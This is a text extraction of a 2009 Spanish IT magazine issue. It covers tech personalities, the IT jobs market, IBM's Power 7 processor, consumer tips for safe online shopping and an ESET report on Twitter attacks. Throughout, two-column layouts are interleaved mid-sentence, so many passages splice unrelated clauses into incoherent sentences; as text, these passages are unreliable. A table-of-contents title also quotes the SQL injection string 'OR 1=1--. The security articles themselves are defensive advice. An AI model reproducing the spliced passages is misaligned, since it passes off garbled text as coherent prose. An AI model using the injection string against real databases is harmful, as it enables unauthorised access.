NexIT Edicion Especial Web

Page 1



programación

STAFF Director - C. O. Rodriguez Propietarios - Editorial Poulbert SRL. Responsable de Contenidos - Carlos Osvaldo Rodriguez

Editorial

Coordinacion Editorial - María Delia Cardenal - Carlos Rodriguez

A medida que la economía mundial lucha por re-

Senior Security Editor - Carlos Vaughn O Connor

online está más sano que nunca: innovación técni-

Departamento Comercial publicidad@revistanex.com Colaboran en esta edición Redacción - Catalina Barruti - Gustavo Cardinal - Julia Nuñez - Carlos Vaughn O Connor DISEÑO - Eugenia López - Stheven Florez Bello - Carlos Rodriguez Bontempi SUSCRIPCIONES suscripciones@revistanex.com NEX IT Revista de Networking y Programación Registro de la propiedad Intelectual en trámite leg número 3038 ISSN 1668-5423 Dirección: Av. Corrientes 531 P 1 C1043AAF - Capital Federal Tel: +54 (11) 5031-2287 Queda prohibida la reproducción no autorizada total o parcial de los textos publicados, mapas, ilustraciones y gráficos incluidos en esta edición. La Dirección de esta publicación no se hace responsable de las opiniones en los artículos firmados, los mismos son responsabilidad de sus propios autores. Las notas publicadas en este medio no reemplazan la debida instrucción por parte de personas idóneas. La editorial no asume responsabilidad alguna por cualquier consecuencia, derivada de la fabricación, funcionamiento y/o utilización de los servicios y productos que se describen, analizan o publican.

Si desea escribir para nosotros, enviar un e-mail a: redaccion@revistanex.com

cuperar su equilibrio, el sector de la delincuencia

ca, nuevas tácticas para la generación de ingresos y adopción de las mejores estrategias de negocio son algunas de las maniobras más utilizadas para lograr maximizar los beneficios. Es por esto que decidimos dedicar esta edición de NEX IT a la seguridad. Veremos de la mano de Carlos Vaughn O’Connor, Licenciado en Sistemas Informáticos y Consultor en Seguridad Informática, cómo prevenir que nos roben al hacer transacciones online y cómo evitar que nos kackeen la cuenta de Twitter. Siguiendo con la temática, Seguridad en Aplicaciones Web, especialmente lo referido a CAPTCHA y a las técnicas de SQL Injection. Además, veremos la importancia de la seguridad en las soluciones de movilidad corporativa y cuál es el negocio de la seguridad de la mano de Midyear Security Report de Cisco para 2009. Además, y como todos los issues incluimos notas sobre personalidades, aplicaciones, hardware, virtualización y más. Esperamos que la disfruten y no dejen de escribirnos a redaccion@revistanex.com

/ NEX IT Especial Web /

3


programación

sumario NOTA DE TAPA

Seguridad 22 Cómo prevenir que me roben al hacer transacciones online Vivimos en la era digital y lo que antes hacíamos de manera personal ahora las hacemos a través de Internet. Por eso les presento diez medidas que deberían ser tenidas en cuenta a la hora de hacer transacciones en la red.

Carlos Vaughn O’Connor

26

50

Cómo prevenir que me kackeen la cuenta de Twitter

SQL Injection: Más allá del ‘OR 1=1--

El precio de la fama sale caro. Así lo demuestra Twitter, que tras su explosivo crecimiento se convirtió en el blanco predilecto de los ciberdelincuentes, según revela un informe de la compañía de seguridad informática de ESET.

Las técnicas de SQL Injection siguen constituyendo un gran número de las amenazas latentes en la red. A pesar de ello las variadas formas de explotación que posee constituyen el principal motivo de su continua evolución y su permanente utilización.

Carlos Vaughn O’Connor

Ariel Liguori

Cinco

Las 6

IT

del

personalidades Elegimos a cinco personalidades que desafían estos momentos turbulentos con el poder de las ideas y la innovación. Ellos se mofan de la crisis y siguen generando ingresos millonarios. 4

08

/ NEX IT Especial Web /

tendencias

2010

Al seguir de cerca el mercado tecnológico se puede tener una idea de las tendencias que se afianzaron en la primera etapa de 2009 para saber cuáles se profundizarán de cara al 2010.

94

La mujer

que enseña la clave del

exito

Con el nuevo concepto de Internet 2.0 surgieron miles de nuevas aplicaciones que facilitaron muchos de los usos que le dábamos a Internet. Acá les presentamos un listado de las peores.

102


ESPECIAL WEB

64

edicion especial seguridad 3.0

Fedora 11 Conozcamos lo nuevo de la última versión del sistema operativo basado en Linux.

60

46

30

La Importancia de la Seguridad en las Soluciones de Movilidad Corporativa

El negocio de la Seguridad

Seguridad en Aplicaciones Web: CAPTCHA

IDC da seguimiento el mercado de TI y telecomunicaciones en el mundo y percibe que la seguridad es uno de los principales factores que las empresas aprueban al momento de escoger una solución de movilidad corporativa.

Innovación, sofisticación y colaboración entre criminales son algunas de las conclusiones del Midyear Security Report de Cisco para 2009.

El hecho de vulnerar una aplicación Web es el primer paso de un proceso de fraude que tiene como fin desestabilizar una empresa.

virtualizacion

general

VMware Server 2.0 en Debian Lenny

Acá si hay trabajo

Cómo instalar y configurar VMware Server 2.0 sobre Debian GNU/Linux en su versión STABLE “Lenny”.

Muchas

Emiliano Piscitelli Pablo Sebastián De Vita Lemus

aplicaciones y

76

ninguna utilidad Con el nuevo concepto de Internet 2.0 surgieron miles de nuevas aplicaciones que facilitaron muchos de los usos que le dábamos a Internet. Acá les presentamos un listado de las peores.

70

CNEISI 2009 Todo sobre la tercera edición del Congreso Nacional de Estudiantes de Ingeniería en Sistemas de Información.

Silvana M. Armando

106

A pesar de la crisis mundial hubo un sector que se mantuvo intacto, que siguió creciendo y se siguió expandiendo al punto de no dar abasto con la considerable demanda de profesionales: este es el sector tecnológico.

12

hardware Power 7: El procesador en potencia Hasta tres veces más potente que su antecesor, Power 7 es el próximo proyecto de IBM que se comercializará a partir de la primera mitad de 2010. En esta nota les presentaremos las increíbles características de este procesador.

18


eventos

Lo que dejó

Expocomm 2009 Del 22 al 25 de septiembre se llevó seminarios, de los que participaron a cabo la 17 edición del tradicional gerentes de empresas como Cisco, evento de informática y telecomu- Telefónica o Microsoft, Capellán aunicaciones Expocomm, que anual- guró un buen pasar para la industria mente reúne a las principales firmas tecnológica: “el sector moverá 49.000 del sector IT. Sin embargo, este año millones de pesos”, lo que equivale a la falta de material nuevo o de actos un 10 por ciento más que en el 2008. de lanzamientos reflejó una realidad A pesar de esto, todos los que ingreincuestionable: la crisis también gol- saron a la Exposición se dieron una peó al círculo IT.

vuelta por el colorido stand de NEX

Aunque algunos de los principales IT G43 donde se llevaron el último actores como Claro, Nextel, Nokia, número de la revista con las claves DirecTV, Kodak, Intel, dieron el pre- del Open Source y el folleto de Vosente al evento, este año la muestra cación IT, con todas las claves que se vio más pobre: reunió a 98 com- explican porqué es importante ser un pañías, contra las 165 que agrupó en profesional de la informática. 2008. Además, según la Cámara de Informática y Comunicaciones de la República Argentina asistieron solo 26.474 personas, un 25 por ciento menos que el año pasado. “Este es un año muy especial en el mundo y se refleja en las empresas”, explicó Norberto Capellán, presidente de Cicomra. No obstante, durante los

6

/ NEX IT Especial Web /


eventos

/ NEX IT Especial Web /

7


General

5

Personalidades que enfrentan la revolución digital en Sillicon Valley

Elegimos a cinco personalidades que desafían estos momentos turbulentos con el poder de las ideas y la innovación. Ellos se mofan de la crisis y siguen generando ingresos millonarios. Larry Page y Sergey Brin

Como si todo esto fuera poco, el ala

Ellos inventaron la tecnología, la com- filantrópica de Google, Google.org, pañía, el verbo. Con solo 23 y 24 años destinó 100 millones de dólares a un respectivamente, los Google Boys fondo solidario de cooperación para pusieron la información mundial al ayudar a que se regule la pobreza, alcance de nuestras manos.

energía y el ambiente a nivel global.

Primero nos dieron las herramientas para organizar Internet con el buscador Google, luego pusieron a disposición de todo el mundo miles de herramientas fáciles de usar y sumamente útiles: un cliente de correo electrónico, noticias, mapas (de la tierra, del cielo y el espacio y ahora ¡de la luna!), libros, códigos fuente de programas, un calendario y para colmo (de Microsoft) todo de manera gratuita. 8

/ NEX IT Especial Web /

// “Con solo 23 y 24 años, pusieron la información mundial al alcance de nuestras manos”


General

Mark Zuckerberg

Steve Jobs

Con solo 24 años digita las horas muertas de toda una generación. En lo que va de este año su adorable criatura ya cosechó unos 250 millones de usuarios. Mark, quien dentro de poco tendrá libro y films propios, apuesta a triplicar sus ganancias en los próximos años y de seguir en ascenso lo logrará. Por el momento Zuckerberg vendió el 1,6 por ciento de su empresa a Microsoft. Habrá que ver si el joven sabe sostener estos buenos negocios.

// “Tiene logros como la creación de la computadora Apple, el iPhone, el iPod, la Mac, la empresa de animación Pixar. Es uno de los mayores innovadores en lo que a tecnología respecta. En su haber tiene logros inmensos como la creación de la computadora Apple, el iPhone, el iPod, la Mac, la empresa de animación Pixar. Productos que transformaron y mejoraron nuestra // “En lo que va de este año su adora- manera de vivir y la tecnología en ble criatura cosechó 250 millones de general. Convertido en el icono de usuarios.”

la industria tecnológica estadouni/ NEX IT Especial Web /

9


General dense, este hombre de 54 años supo “todos”. Stallman fue quien inventó cosechar fortunas y realizar negocios el término “Software libre” y quien brillantes. Tuvo éxito en todos lados estableció un marco de referencia y pudo superar varios desafíos, entre moral, político y legal para el moviellos uno personal que afectó seria- miento del software libre, como una mente su salud cuatro años atrás, un alternativa al desarrollo y distribucáncer de páncreas y recientemente ción del software no libre o privativo. un satisfactorio trasplante de hígado. El programador también inventó el

Richard Stallman

concepto de copyleft (aunque no el término), un método para licenciar software de tal forma que su uso y modificación permanezcan siempre libres y queden en la comunidad. Dentro de unos días vendrá a promover su filosofía “abierta” a nuestro país, en la Wikimanía 2009.

Bill Gates El hombre más rico del mundo se supera a si mismo. Con la fundación de beneficencia que puso junto a su // Él introdujo una nue-

esposa Melinda Gates, el magnate

va corriente filosófica,

donó 33 millones de dólares a China

más libre, más accesi-

para combatir la tuberculosis, con lo

ble, para “todos”.

que se ganó el reconocimiento como

Es el personaje que rompe los cá- “el hombre más generoso de todos”. nones tradicionales y la manera de Gates tiene con que sostener estos concebir la industria informática. Él gastos y tiene más proyectos en los introdujo una nueva corriente filosó- que invertirá a futuro: entre ellos, sofica, más libre, más accesible, para licitó unas patentes que contemplan 10 / NEX IT Especial Web /


General el despliegue de una flota de buques especializados en el océano, con el objetivo de seguir la ruta de los huracanes y así poder prevenirlos. ¿Un superhéroe? No. Un hombre que tiene una aguda visión para los negocios. Así lo demuestra el hecho de que Windows está instalado en el 90 por ciento de las computadoras del mundo, que el buscador que le hace frente a Google y que pueda hacerle frente a rivales de la talla de Steve Jobs.

publicidad

// ¿Un superhéroe? No. Un hombre con una aguda visión para los negocios.

/ NEX IT Especial Web /

11


General

Acá si hay trabajo Como una fila de fichas de dominó que van cayendo de a una por el peso de la otra, fueron cayendo todos los sectores de la economía. Por repercusión o por eco del sector de al lado, la crisis mundial se fue desparramando y fue derribado a casi todos los sectores de la economía. Sin embargo, hubo un sector que, a pesar de esto, se mantuvo intacto, que siguió creciendo y se siguió expandiendo al punto de no dar abasto con la considerable demanda de profesionales: este es el sector tecnológico.

L

a falta de profesionales con primera empresa de reclutamiento IT perfiles tecnológicos vino en nuestro país. Sumado a que los acompañada

del

impor- graduados en informática decrecen

tante crecimiento explo- año a año.

sivo del sector, principalmente con el aumento en las áreas de telefonía Según un informe de Adecco, en los móvil, Internet y el desarrollo de soft- últimos años el volumen de negocios ware en servicios informáticos. En de las empresas de tecnología aumenese escenario donde la tecnología es tó considerablemente. En septiembre la protagonista de la vida de todos, la de 2007 el incremento de la facturademanda de profesionales es perma- ción de las empresas fue del 7,1 por nente y creciente. “La dependencia ciento con respecto al año anterior, de los sistemas hace que sea imposi- un volumen que se situó cerca de los ble detenerse”, asegura Alberto Torri- 262.345 millones de euros. Luego, si, gerente de Sapphire Technologies, los datos del mes de octubre de 2008

12 / NEX IT Especial Web /


General

Alberto Torrisi, gerente de Sapphire Technologies,

confirmaron dicha tendencia en alza, menos que en 2009. Esta sumatoria cuando la cifra de negocios aumentó de factores desencadenó la carencia otro 0,5 por ciento. Y durante este año de profesionales que existe hoy en el se mantuvo igual. Sin embargo, el mercado. despegue que tuvieron las empresas de alta tecnología no estuvo acompa- Torrisi asegura que anualmente egreñado por el crecimiento de expertos san de las universidades 3.000 alumen el sector, sumado a que los gra- nos especializados en carreras IT, la duados en informática cayeron un 13 mitad de recursos que actualmente por ciento desde 2002. Esto provocó demanda el mercado (de un los 10 mil un déficit de 25.000 profesionales in- profesionales). Según el empresario, cluyendo a todos los sectores de IT. esto se debe a que ante la urgencia De hecho la consultora analizó que el de cubrir un puesto cuando hay un número de universitarios graduados proyecto en marcha, en muchos caen nuestro país fue un 13 por ciento sos la búsqueda se torna más flexible / NEX IT Especial Web /

13


General por lo que se puede llegar a cubrir un Del último informe realizado a prinpuesto importante tanto con un estu- cipios de este año por Bumeran.com diante de tercero como con uno de se desprende que “aunque nos enquinto año (generalmente, el último contramos en medio de un contexto de la carrera).

“Hoy con tres años

internacional que está llevando a una

de experiencia probablemente un considerable reducción de los presuprogramador de C++ se considere un puestos de los departamentos de Renivel senior, cuando antes se reque- cursos Humanos, el rubro de IT es el rían 7. En base a la gran demanda del que incorporará más personal duransistema bajó bastante la exigencia

”,

te 2009”.

sentencia. Y es la oportunidad de poder insertarse en el mercado y perci- Los más buscados bir un sueldo por demás atractivo lo Según Alberto Torrisi los perfiles más que produce que muchos posterguen requeridos podrían englobarse en sus carreras.

tres grandes grupos. Un primer grupo correspondería a los perfiles fun-

El mercado tecnológico se avizora cionales, que son aquellos que se como un oasis en medio del desierto encargan de llevar a la práctica los en un marco de desocupación como nuevos procesos; un segundo grupo el actual.

“De los 7 mil millones de

podría ser el de los perfiles de Desa-

la población económicamente activa, rrollo, que son las personas encargasolo hay un 1 por ciento que corres- das de diseñar (o desarrollar) un proponde al sector tecnológico, estos grama; y un tercer grupo sería el de son unos 70 mil u 80 mil profesiona- Infraestructura, que son quienes se

”, asegura

les, el mercado esta seco

encargan de verificar que el progra-

Torrisi.

ma funcione. Torrisi señala que los

“Si actualmente tuviéramos

10 mil o 20 mil recursos humanos más buscados son los del segundo capacitados, todos tendrían trabajo grupo, los desarrolladores, quienes porque hay un 100 por ciento de ocu- necesitan poseer un nivel de conocipación en este sector 14 / NEX IT Especial Web /

”.

miento muy profundo y específico en


General ingeniería electrónica, a su vez los que más escasean. Según Celia Siffredi, gerente de Recursos Humanos de Microsoft para Argentina y Uruguay,

“la demanda de profesionales espe-

cializados se focaliza en algunas especialidades, fundamentalmente asociadas a los perfiles de ingenieros

”. En representación

del gigante del software, Siffredi afirma que

sus búsquedas se orientan a posiciones calificadas.

“Debido a nuestra propuesta de

valor orientada a soluciones, básicamente tratamos de incorporar ingenieros especializados en tecnologías puntuales

”. En con-

creto, apuntan a universitarios altamente capacitados. Aunque también adhieren a la idea de que si bien la experiencia, junto con un buen nivel de formación académica de base, son factores clave también lo son los aspectos cualitativos.

Con la balanza a su favor Esta carencia de profesionales repercute directamente en los sueldos que aumentan

“Hoy el salario tuvo un incremento del 7 por ciento , afirma Torrisi y ”

año a año.

asegura que los sueldos son muy altos para casi todos los perfiles.

“Un perfil para un

programador junior puede llegar a ganar en / NEX IT Especial Web /

15


General

la actualidad y en este mismo contex- te de sistemas de una gran empreto de crisis entre tres mil y cuatro mil sa ostentan salarios que van de los pesos, mientras que un profesional 7.000 a los 15.000 pesos. Mientras con experiencia puede alcanzar los 8 que los programadores (tan busca-

”, dice.

mil pesos

dos por grandes empresas como Mi-

Según el Consejo Profesional de crosoft), alcanzan salarios que van de Ciencias Informáticas de la Provincia los 4.000 a los 7.000 pesos, los junior de Córdoba (CPCIPC), las posiciones y los senior, respectivamente (estos tales como Gerente de Sistemas de son salarios que corresponden a los una Pyme arrancan en los 3.500 a profesionales especializados en Java, 7.000 pesos, mientras que un Geren- .Net y PHP).

Acerca de Sapphire Technologies Sapphire Technologies se especializa en Servicios de Outsourcing de IT, búsqueda, selección y provisión de personal para sectores de tecnología y sistemas. Abarca desde la operación de servicios gestionados e implementación de proyectos tecnológicos, hasta el reclutamiento y provisión de recursos para los sectores de sistemas e informática de empresas de la talla de Telecom, Coca Cola, Royal Canning, CTI, Quickfood, Global Crossing, etc. Sapphire forma parte de Randstad NV. Desde la adquisición de Vedior en 2008, el Grupo de Randstad es

16 / NEX IT Especial Web /

el segundo proveedor de servicios de RRHH más grande del mundo, con liderazgo en Australia, Bélgica, Canadá, Francia, Alemania, India, Luxemburgo, Países Bajos, España, Suiza, Polonia, Portugal, y Estados Unidos. Randstad tiene presencia en 53 países, más de 5.400 oficinas y 34.000 empleados. Randstad y Vedior generaron el ingreso combinado de 17.2 mil millones de euros en 2008. El Intercambio de las mejores prácticas entre los profesionales de Sapphire y Vedior en el mundo aseguran al staff de Sapphire Argentina la actualización permanente y el dominio de las técnicas y metodologías más modernas aplicadas a la gestión de procesos y recursos humanos de IT.


General

PUBLICIDAD

/ NEX IT Especial Web /

17


7

hARDWARE

Power El procesador

en potencia

Hasta tres veces más potente que su antecesor, Power 7 es el próximo proyecto de “The Big Blue” que se comercializará a partir de la primera mitad de 2010. En esta nota les presentaremos las increíbles características de este procesador que llega de la mano de System Director Vm Control, el software que facilita la gestión de sistemas virtuales heterogéneos, especialmente apuntado al sector corporativo. El adjetivo perfecto para estos nue-

de dos procesadores para llegar

vos procesadores es “potencia”. Esta

a multiplicarse en un total de 16

se debe a que su diseño permite infi-

núcleos.

nidad de combinaciones para que el

Pero esto no es todo, cada uno de

dispositivo aumente su capacidad lle-

estos ocho cores de Power 7 tie-

vándolo a valores nunca antes vistos.

ne una potencia individual de 32

Veamos primero sus especificaciones

Gigaflops y sumando este núme-

técnicas que lo dotan de una estructu-

ro 8 veces, nos da un total de 256

ra interna única: si su antecesor con-

Gigaflops de potencia por proce-

taba con 2 núcleos, Power 7 cuenta

sador, un rendimiento que bajo

con exactamente el cuádruple, 8, los

estos términos duplica al actual

cuales pueden montarse en arreglos

Power 6.

18 / NEX IT Especial Web /


hARDWARE Lo más asombroso es que Power 7 cada núcleo o core de Power 7 tendrá operará bajo los mismos 5.0Ghz que en total cuatro hilos de ejecución (o el anterior. Esto significa que los nue- “threads”) y si consideramos que el vos procesadores serán entre dos y procesador posee en total 8 núcleos, tres veces más potentes que los vie- entonces, jos y consumirán la misma energía.

simples

matemáticas:

Power 7 tendrá en total de 32 hilos

Además, será un procesador bajo de ejecución (la versión anterior por proceso de manufactura de 45nm, ejemplo cuenta con 2 hilos de ejetecnología en la cual la compañía tie- cución por núcleo para un total de 4 ne experiencia gracias al desarrollo thread, tomando en cuenta que es un del procesador de la PS3. Otras opti- procesador doble núcleo), gracias a mizaciones que se harán en Power 7 los cuales podrá llevar a cabo distinserán su capacidad multihilo, ya que tas funciones simultáneamente.

Systems Director Vm Control, el software corporativo Es el nombre del nuevo software que llega de la mano de este procesador y que facilita la gestión de servidores virtuales heterogéneos, mientras, al mismo tiempo, ofrece la posibilidad de supervisar y localizar todos los recursos virtuales de los que disponga una empresa. De esta manera IBM busca agilizar las tareas de gestión de los servidores y máquinas virtuales que haya en una organización así como desplegar y gestionar cargas de trabajo con una interfaz común para procesadores Power Systems. “A medida que se incrementa el número de máquinas virtuales, también se incrementa el temor a una caída virtual”, señala Scott Handy, vicepresidente de IBM Power Systems. “Esa es una de las razones por la que los usuarios desean mejores capacidades de admi-

nistración”, agrega Handy. El sistema VMControl nació precisamente para eso, ya que incluirá la administración de los hypervisores de Microsoft y VMware, junto con los sistemas de virtualización de sus sistemas Power y mainframe y le dará a los usuarios una gama de capacidades para modificar, editar, catalogar y utilizar servidores virtuales con diferentes servidores físicos, señaló Handy. Los usuarios “quieren una forma consistente de administrar estos ambientes virtuales” junto con sus sistemas físicos, señaló. VM Control es parte de la familia de software IBM Systems Director que se utiliza para la administración de servidores, almacenamiento y redes IBM, puede relevar automáticamente, monitorear y actualizar automáticamente recursos virtuales.

/ NEX IT Especial Web /

19


hARDWARE

De esta manera, Power 7 ofrecerá Microsystems y sus procesadores Ulmejores opciones de virtualización, y trasparc, o como Intel y los Itanium o triplicará la performance de su ante- como AMD y los Optaron cesor lanzado en el 2007. Power 7 es la apuesta de IBM para competir con otros grandes del mercado de procesadores, como Sun

IBM y su proyecto Blue Waters IBM busca desafiar los límites, siempre y como sea. Por eso decidió crear una supercomputadora de nombre Blue Water que superará el rendimiento de petaflop (operaciones de punto flotante por segundo, por sus siglas en inglés) de la versión anterior. Parece que esta nueva computadora será tres veces más rápida y podrá realizar unas mil trillones de operaciones por segundo. Para lograr semejante récord, la empresa deberá invertir cerca de 200 millones de dólares en la máquina que una vez que esté terminada (se estima que eso será en el año 2011) será instalada en el Nacional Center for Supercomputing Applications (NCSA) de la Universidad de Illinois, Estados Unidos, convirtiéndose así en la computadora de uso público más rápida del mundo. Así de grande como su capacidad será su tamaño, por lo que no sólo será difícil abastecer a este gigante de electricidad, sino que tampoco será una tarea del todo sencilla encontrarle un

20 / NEX IT Especial Web /

lugar adecuado para su ubicación. Al parecer, la supercomputadora se utilizará en distintas operaciones que realiza la Agencia de Proyectos e Investigaciones avanzadas de Defensa, aunque también hay noticias de que recurrirían a ella para el modelado del clima, biofísica, bioquímica y proyectos de informática. Te preguntarás cuales serán las especificaciones técnicas de esta bestia. Según informan desde el sitio The Register, este monstruoso artefacto tendrá una potencia total de 10 PetaFlops , con la increíble suma de 620TB de memoria y más 26 Petabyte de almacenamiento, algo así como la capacidad de almacenamiento combinada de 26.000 discos duros de 1TB. Esta máquina basada en procesadores Power 7, ocupará un espacio de 300 metros cuadrados y será la computadora más poderosa jamás creada. Si el proyecto funciona, probablemente llegue a liderar el ranking Top 500 y a superar a la “RoadRunner“, la computadora hasta ahora más poderosa.


hARDWARE Actualizaciones y disponibilidad de Power 7 Junto al anuncio de su nuevo software, IBM ofrece también una actualización a la última generación de los servidores Power con procesadores Power7, lo que, según la compañía, permitirá a los clientes proteger sus inversiones a largo plazo en la plataforma Power Systems. IBM también quiere hacer el camino del upgrade de Power6 a Power7 tan simple como sea posible. La compañía permite a los usuarios que tienen los servidores 570 y 595 basados en Power6 cambiarse al nuevo chip sin tener que pasar por un tiempo de caída, al usar el PowerVM Live Partition Mobility o AIX Live Application Mobility. De esta manera IBM podrá ayudar a sus clientes a reducir la explosión de servidores y los costos de infraestructura eliminado servidores UNIX y x86 subutilizados.

/ NEX IT Especial Web /

21


Seguridad

Carlos Vaughn O’Connor Licenciado en Sistemas Informáticos y Consultor en Seguridad Informática

Cómo prevenir que...... me roben al hacer transacciones online

V

ivimos en la era digi- si alguien nos roba esa información? tal, por lo tanto todas No sería extraño que hoy en día sucelas cosas que antes diera eso. De hecho, con la cantidad hacíamos de manera de hackers profesionales, programas

personal, ahora las hacemos a tra- de spyware y virus que circulan por la vés de Internet. Las compras en el Web, resulta muy fácil que cualquiera supermercado, los pagos de tarjetas, se convierta en víctima de un fraude las reservas de hoteles, reservas de o de robo de identidad. pasajes, etc. Lentamente fuimos adquiriendo el hábito de volcar todos Por eso, en pos de preservar su intinuestros datos personales (núme- midad y evitar un robo, les presento ros de tarjetas de crédito, de cuentas diez medidas que deberían ser tenibancarias, contraseñas) en la red con das en cuenta a la hora de hacer trantotal naturalidad. Pero ¿qué sucede sacciones en la red.

22 / NEX IT Especial Web /


Seguridad

1

Mantenga sus datos

3

No utilice la misma

personales y sensibles fuera de su computadora.

contraseña para cada sitio

que usa en Internet.

Trate de nunca, bajo ninguna circuns- Todos odiamos tener que recordar tancia, escribir su número de cuenta diferentes passwords y sería mucho bancaria en su sistema. Ni en Mis más simple poder utilizar nuestro documentos, ni en el disco rígido, ni primer nombre o un apodo simple mucho menos en el desktop.

2

como “Pepe” o “Lola” para todos los sitios a los que ingresamos, pero

Evite guardar información

esto facilitaría muchísimo el trabajo

privada en sitios online

de los hackers, aficionados en robar

como eBay o Mercado Libre. passwords. Por eso, en esta, nuestra

Muchos sitios Web de hoy en día, ta- tercera recomendación, le sugerimos les como Amazon o eBay, ofrecen la que utilice una contraseña diferente posibilidad de guardar la información para cada sitio y que en lo posible de las tarjetas de crédito para evitar que sea alfa numérica (combinación tener que ingresar esa gran cantidad de letras y números). de números cada vez que se quiera comprar algo. Sin embargo, a la hora de tener que cargar información tan

4

Antes de brindar la informa-

ción solicitada piense bien.

privada se debería tener en cuenta Muchas veces nos llegan mails de suque todos los días hay un grupo de puestas entidades conocidas por noprofesionales, es decir, de hackers sotros en los que se nos pide que haprofesionales, corrompiendo estas gamos click en un link, ingresemos a bases de datos y descargando miles un sitio, y volquemos allí información de números de tarjetas de crédito y de sensible, como nuestros datos bancacuentas bancarias. Quizás le consuma rios, números de tarjetas de crédito, unos minutos más de su tiempo, pero etc. Lo más seguro en estos casos y conviene eso antes que ser robado.

para asegurarnos de estar ingresan-

/ NEX IT Especial Web /

23


Seguridad

do al sitio real y no a una copia, es tipear la dirección manualmente. Re-

7

cuerde siempre que no porque exista

Asegúrese de que su antivirus y antispyware estén actualizados.

un sitio Web, éste será legítimo. Mu- Esta recomendación puede resultar cho menos si se trata de un pop up.

obvia, pero no siempre todos la tie-

5

nen en cuenta y es muy importante Sólo conéctese a redes

que aunque sea tenga el AVG, que es

inalámbricas seguras.

gratuito actualizado.

En principio, si es dueño de una red inalámbrica, asegúrese de ponerle una contraseña. Si, en cambio, está

8

Use un navegador seguro a

la hora de hacer compras.

intentando “colgarse” de una red, Puede ser Firefox o Internet Explorer, trate al menos de evitar conectarse pero dado que el Explorer ha sido en cualquiera. Estos sitios a los que víctima de recientes fraudes y vulnese conecta pueden estar infectados rabilidades, lo más conveniente es con virus y contaminar su sistema. usar el navegador de Mozilla. ¡Debe evitarlos a toda costa!

6

Borre el historial de su navega dor después de haber hecho alguna transacción online.

9

Asegúrese de que la URL en cuestión tiene un HTTPS y no un HTTP.

Cuando usted compra algo de Ama-

A veces su navegador puede guardar zon.com, MercadoLibre.com o de alla información tipeada. Además, si al guna otra página Web, cuando esté ingresar a un sitio recibe un mensa- dentro del sitio de la compra debe je donde le ofrecen guardar automá- asegurarse de que la URL comience ticamente sus contraseñas, siempre siempre con un HTTPS. La “S” al final debe tildar la opción NO.

24 / NEX IT Especial Web /

de http indica que la comunicación


Seguridad

entre la computadora y el servidor es segura y encriptada. Si alguien intenta leer los datos mientras viaja a través de Internet, no será capaz de entenderla o descifrarla. Si está comprando algo de un sitio pequeño y no tienen HTTPS, será mejor que lo haga por teléfono.

10

Bloquear la computadora en

la oficina y en casa cuando no la esté usando.

Este es otro de los consejos que nadie tiene en cuenta, sobre todo en la oficina. Con solo presionar CTRL+ ALT + SUPR se puede evitar tentar a cualquiera que quiera acceder al sistema a robar sus datos, que por otro lado, como le recomendamos en el tip 1, es mejor no guardar.

/ NEX IT Especial Web /

25


Seguridad

Carlos Vaughn O’Connor Licenciado en Sistemas Informáticos y Consultor en Seguridad Informática

... me kackeen la cuenta de

E

l precio de la fama sale La metodología de envío de mensacaro. Así lo demuestra jes ilegítimos incluye diversas accioTwitter, que tras su explo- nes entre las que se destacan: sivo crecimiento se con-

virtió en el blanco predilecto de los

- La creación de cuentas por usua-

ciberdelincuentes, según revela un rios maliciosos que luego agregan informe de la compañía de seguridad contactos al azar para enviarle sus informática de ESET.

mensajes.

- El robo de información personal de

La creciente masividad en el uso de perfiles de usuarios para enviar menTwitter en poco tiempo derivó en que sajes a sus seguidores haciéndose los cibercriminales orientasen sus pasar por el contacto legítimo. ataques a esta y otras populares re-

- La utilización de vulnerabilidades

des sociales. En el caso de Twitter fue de la aplicación para poner mensajes a principios de junio que aparecieron ilegítimos en usuarios reales. diversas técnicas de hacking. 26 / NEX IT Especial Web /


Seguridad Con el objetivo de incrementar la & Educational Manager de ESET Lared de ataques aprovechando la co- tinoamérica. municabilidad de Twitter, entre los principales mensajes para engañar al ¿Cómo prevenirse? usuario, según advierte ESET, se des- Siempre verificar quién es el contacto tacan los que incluyen enlaces que que está publicando dicho contenido. redireccionan a los usuarios a sitios En caso de ser un usuario conocido, Web como ser:

•Mensajes cuyos enlaces llevan al

verificar que sea él quien efectivamente está enviando dicho mensaje.

usuario a sitios Web con contenido malicioso.

•Mensajes spam que derivan en sitios con publicidad.

•Mensajes de phishing que inclu-

En el caso de que la cuenta de un contacto haya sido comprometida, muchas veces las publicaciones ilegítimas tienden a engañar a los usua-

yen un enlace a un formulario que rios y pedirles que hagan clic en un lleva a los usuarios a completar un enlace. Una forma fácil para reconoformulario y así concretar el robo de cer el engaño es prestar atención a la credenciales personales para que el forma de escritura que por lo general atacante acceda a su cuenta y realice es bastante diferente a cómo lo haría acciones maliciosas con los contac- el usuario real de la cuenta. tos de la víctima del ataque.

“Los creadores de malware siempre

En este sentido, una buena medida para advertir esto, es preguntarle al

están buscando las plataformas más contacto, preferentemente por otros utilizadas para realizar todo tipo de medios, si efectivamente publicó diataques, por eso y debido a la ma- cho mensaje. sificación mundial de Twitter, era de esperarse que en algún momento Debido a que los mensajes ilegítimos fuera foco de usuarios maliciosos

”,

que circulan en Twitter suelen apun-

explicó Cristian Borghello, Technical tar a sitios falsos en los que se ofre/ NEX IT Especial Web /

27


Seguridad cen servicios o productos fraudulen-

“La aparición de técnicas de engaño

tos o que contienen diversos códigos en redes sociales no es una novedad,

maliciosos, es fundamental contar ya que el creciente uso de populares con software de seguridad con capa- aplicaciones de la Web 2.0 conlleva a cidades de protección proactiva que que los atacantes informáticos actuasean capaces de detectar no sólo el licen sus metodologías para estar a malware conocido sino también com- la orden del día con el avance tecno, afirma Sebastián Bortnik, ” Analista de Seguridad de ESET Lati-

plejas amenazas informáticas desco- lógico nocidas.

noamérica. Además, siempre existe la posibilidad de poder denunciar este tipo de ca-

“Frente a este panorama, una de

sos, una vez que han sido detectados. las primeras barreras de protección Debido a que los usuarios que parti- surge a través de la información y cocipan en Twitter son quienes conocen nocimiento de la existencia de estos su funcionamiento y a los contactos ataques ya que un usuario capacitacon quienes intercambian informa- do en las últimas tendencias de seción, es importante que conozcan la guridad informática podrá prevenir existencia de estas acciones para de- potenciales riesgos y contribuir a dis-

tectarlas a tiempo y poder frenar un minuir la cadena de infección tipo específico de ataque.

28 / NEX IT Especial Web /

concluye Bortnik


Seguridad

/ NEX IT Especial Web /

29


Seguridad

Autores: Marcelo Caceres, Director Thor IT Security

Mariano Somoza, Gabriel Vergara, Thor IT Security

Seguridad en Aplicaciones Web CAPTCHA ¿Por qué son importantes las

los tres pilares que definen los prin-

aplicaciones Web?

cipios de todo sistema que manipule

